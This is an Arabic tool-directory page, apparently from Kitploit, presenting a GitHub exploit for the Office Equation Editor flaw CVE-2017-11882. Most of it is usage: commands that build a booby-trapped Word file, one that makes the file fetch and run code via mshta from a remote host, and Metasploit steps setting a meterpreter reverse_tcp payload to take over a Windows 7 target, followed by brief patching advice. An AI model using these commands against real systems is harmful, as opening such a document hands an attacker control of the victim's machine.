Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-11882 — CVE-2017-11882(قتل شامل لـ Office من 2003 إلى 2016) | Kitploit
أدوات/GitHubGitHub/littlebin404/cve-2017-11882
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882(قتل شامل لـ Office من 2003 إلى 2016)

عرض المستودع
53منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظرة عامة على CVE-2017-11882

من حيث تأثير الاستغلال، يمكنه اختراق جميع إصدارات Office من 2003 إلى 2016، وبناء بيئة الهجوم بسيط للغاية. ينجم هذه الثغرة عن [محرر المعادلات] داخل برنامج Office، حيث لا يتحقق عملية المحرر من طول الاسم، مما يؤدي إلى تجاوز سعة المخزن المؤقت، ويمكن للمهاجم تنفيذ تعليمات برمجية عشوائية عن طريق إنشاء أحرف خاصة. على سبيل المثال، إذا استغل المخترق هذه الثغرة لإنشاء ملف Office يحتوي على باب خلفي للشيل، فعندما يفتح مستخدم عادي ملف Office هذا، يمكن للمخترق السيطرة على الكمبيوتر مباشرة.

الإصدارات المتأثرة:

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

الاستخدام

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

عند النقر على ”test.doc” الذي تم إنشاؤه، يتم فتح أداة الآلة الحاسبة بنجاح.

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

تم إنشاء ملف Word 11882-3.doc بنجاح.

ضع ملف cve_2017_11882.rb في الدليل /usr/share/metasploit-framework/modules/exploits/windows/smb:

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

بدء حالة الاستماع:

Image

عند النقر على ملف 11882-3.doc في جهاز الهدف Win7، تم الحصول على الجلسات بنجاح!

Image

إصلاح الثغرة

① التحديث عبر الإنترنت: قم بتشغيل تحديث Windows Update، وهذه الطريقة كافية لمعظم الأشخاص.

② تثبيت التصحيح: عنوان تصحيح Microsoft لهذه الثغرة: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

تنزيل الأداة